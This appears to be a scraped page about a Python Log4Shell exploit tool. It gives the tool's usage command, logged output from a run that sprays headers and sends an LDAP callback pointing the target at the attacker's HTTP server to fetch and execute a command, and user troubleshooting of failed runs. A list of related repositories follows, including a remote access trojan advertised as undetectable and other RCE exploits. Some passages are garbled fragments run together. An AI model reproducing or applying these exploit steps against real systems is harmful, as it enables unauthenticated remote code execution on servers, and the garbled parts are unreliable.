fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP Headers such as X-Forwarding , Server-IP , User-Agent
python main.py -i lhost -u http://target:targetport -c "command_to_execute" -p lhttp_port -l lldap_port
Having used #2 I still can't see file creation:
The exploit seems to have been applied:
python3 main.py -i 172.17.0.1 -u http://172.17.0.3:8080 -c "touch foobar" -p9999
██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║
██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║
███████╗╚██████╔╝╚██████╔╝ ██║███████║██║ ██║███████╗███████╗███████╗
╚══════╝ ╚═════╝ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝
Log4Shell Exploit (Cyber Struggle Delta Group) via @safe_buffer
[*] Started http server on 9999
[*] Started LDAP server on 1389
[*] Spraying 81 known HTTP Header
okeeje
[+] LDAP Callback sending [('javaClassName', ['Main']), ('objectClass', ['javaNamingReference']), ('javaCodeBase', ['http://172.17.0.1:9999/']), ('javaFactory', ['Main'])]
[+] Redirecting to http://172.17.0.1:9999/Main touch foobar
New HTTP Request 200
[+] Sent the final payload your command has been executed right now
okeeje
[+] LDAP Callback sending [('javaClassName', ['Main']), ('objectClass', ['javaNamingReference']), ('javaCodeBase', ['http://172.17.0.1:9999/']), ('javaFactory', ['Main'])]
[+] Redirecting to http://172.17.0.1:9999/Main touch foobar
And in the 'vulnerable-app' container;
2021-12-15 22:07:41.325 INFO 1 --- [nio-8080-exec-5] HelloWorld : Received a request for API version Log4Shell-CS Reference Class Name: Main
But I can't see any file foobar in the container:
docker exec -ti vulnerable-app sh
/ # ls /tmp
hsperfdata_root tomcat-docbase.8080.4676561178698547045 tomcat.8080.7851898943690850285
/ #
File "main.py", line 243, in
l4shsetup.py is created.l4sh as CLI tool and use it?pip3 install .l4sh in terminalvars.py to be used from package itself[*] Started http server on 9999
[*] Started LDAP server on 1389
[*] Spraying 81 known HTTP Header
Traceback (most recent call last):
File "main.py", line 243, in
What's the problem ? :/
The exploit currently only works if the target can reach the exploiting host's private IP. The exploit needs an option to allow callbacks to a public IP or DNS name that resolves back to a public IP that NATs back to the private IP.
About: Arbitrium is a cross-platform is a remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux an
log4shell-poc-py POC for detecting the Log4Shell (Log4J RCE) vulnerability. Run on a system with python3 python3 log4shell-poc.py <pathToTargetFile> <
Interactsh An OOB interaction gathering server and client library Features • Usage • Interactsh Client • Interactsh Server • Interactsh Integration •
log4j_catcher Log4j exploit catcher, detect Log4Shell exploits and try to get payloads. This is a basic python server that listen on a port and logs i
log4check A small Minecraft server to help players detect vulnerability to the Log4Shell exploit ?? Tested to work between Minecraft versions 1.12.2 a
AnonStress Stored XSS Exploit An exploit and demonstration on how to exploit a S
sshuttle: where transparent proxy meets VPN meets ssh As far as I know, sshuttle is the only program that solves the following common case: Your clien
GitLab-Wiki-RCE RCE Exploit for Gitlab < 13.9.4 RCE via unsafe inline Kramdown options when rendering certain Wiki pages Allows any user with push acc
ProxyShell Install git clone https://github.com/ktecv2000/ProxyShell cd ProxyShell virtualenv -p $(which python3) venv source venv/bin/activate pip3 i
GoAhead RCE Exploit Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamic
CVE-2021-44228 – Log4j RCE Unauthenticated About This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228). This vulnerability
1.Create a Sample Vulnerable Application . 2.Start a netcat listner . 3.Run the exploit . 5.Use jdk1.8.0_20 for better results . Exploit-db - https://
CVE-2021-23132 com_media allowed paths that are not intended for image uploads to RCE. CVE-2020-24597 Directory traversal in com_media to RCE Two CVEs
nds2elf Requirements nds2elf.py uses LIEF and template.elf to form a new binary. LIEF is available via pip: pip3 install lief Usage DSi and DSi-enhan
Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries. Using xrefs to commonly injected and format string'd files, it will scan binaries faster than Firmware Slap.
A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including Python 3.10.*)
scan4log4shell A Burp Pro extension that adds log4shell checks to Burp Scanner, written by Daniel Crowley of IBM X-Force Red. Installation To install
log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk
Log4j_checker.py (CVE-2021-44228) Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a v
861 Feb 18, 2021
2 Dec 22, 2021
2.1k Jan 8, 2023
17 Dec 20, 2021
4 Dec 23, 2021
3 Jun 22, 2022
9.4k Jan 4, 2023
52 Nov 9, 2022
312 Dec 9, 2022
2 Dec 12, 2021
20 Nov 11, 2022
7 Aug 6, 2022
67 Nov 9, 2022
17 Aug 14, 2022
3 Nov 16, 2021
95 Dec 26, 2022
26 Mar 15, 2022
431 Dec 22, 2022
8 Feb 27, 2022